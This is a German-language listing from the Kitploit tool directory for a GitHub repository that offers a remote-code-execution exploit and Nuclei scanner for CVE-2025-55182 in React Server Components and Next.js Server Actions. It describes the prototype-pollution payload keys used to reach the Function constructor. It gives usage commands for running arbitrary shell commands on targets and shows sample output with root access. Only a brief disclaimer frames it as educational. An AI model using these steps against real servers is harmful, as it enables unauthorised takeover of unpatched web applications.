Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface | Kitploit
Tools/GitHubGitHub/sickwell/cve-2025-55182
Vulnerability ScannersCode AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubsickwell/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 - React Server Components RCE Exploit & Scanner Supports external servers and CLI interface

Repository anzeigen
136vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 - React & Next.js Server Actions RCE Exploit

Vollwertiger Remote-Code-Ausführungs-Exploit und Scanner für CVE-2025-55182 in React/Next.js Server Actions.

Original PoC: Spritualkb/CVE-2025-55182-exp

Übersicht

CVE-2025-55182 ist eine kritische Schwachstelle durch Prototype Pollution in React Server Components, die eine Remote-Code-Ausführung ermöglicht. Dieses Repository stellt sowohl automatisierte Scan- (Nuclei-Vorlage) als auch manuelle Exploitation-Tools (Python-Skript) bereit.

Schwachstellenmechanismus:

Der Exploit nutzt Prototype Pollution in der React Flight Protocol-Deserialisierung aus. Er verschmutzt Object.prototype.then über "$1:__proto__:then" und erlangt Zugriff auf den Function-Konstruktor über _formData.get, das auf "$1:constructor:constructor" gesetzt ist, und injiziert dann schädlichen Code über _prefix, der durch Function() ausgeführt wird.

Werkzeuge

1. Nuclei-Vorlage (cve-2025-55182.yaml)

Automatischer Schwachstellenscanner, der den Befehl id ausführt und die Ausgabe über den X-Action-Redirect-Header abruft.

Verwendung:

root@kitploit:~
nuclei -u http://target.com:3000 -t cve-2025-55182.yaml

Funktionen:

  • Führt Testbefehl (id) zur Überprüfung von RCE aus
  • Extrahiert Befehlsausgabe aus Antwort-Headern
  • Mehrere Erkennungsindikatoren (Status 303, Weiterleitungs-Header, Fehlermuster)

2. Python RCE-Exploit (CVE-2025-55182.py)

Vollwertiges RCE-Exploit-Skript, das beliebige Befehle ausführt und die Ausgabe abruft.

Verwendung:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Funktionen:

  • Beliebige Befehle ausführen
  • Automatische Extraktion der Ausgabe aus dem X-Action-Redirect-Header
  • Unterstützung für HTTP/HTTPS- und IP:PORT-Formate
  • Option zur Umgehung der SSL-Zertifikatsprüfung
  • Saubere, formatierte Ausgabe

Testergebnisse

Nuclei-Vorlage

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Python-Exploit

root@kitploit:~
$ python3 CVE-2025-55182.py http://localhost:3001 -c "id"

============================================================
CVE-2025-55182 RCE Exploit
React Server Components Remote Code Execution
============================================================

[*] Target: http://localhost:3001
[*] Command: id
[*] Building payload...
[*] Sending exploit payload...

============================================================
[+] Command executed successfully!
============================================================
[+] Command Output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
------------------------------------------------------------

============================================================
[*] Exploitation attempt completed
============================================================

Betroffene Versionen

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Next.js: 15.x, 16.x (App Router mit Server Actions)

Danksagungen

  • Original PoC: Spritualkb - CVE-2025-55182-exp

Referenzen

  • React Security Advisory
  • Next.js GitHub

Haftungsausschluss

NUR FÜR BILDUNGSZWECKE UND AUTORISIERTE TESTS

Tool herunterladen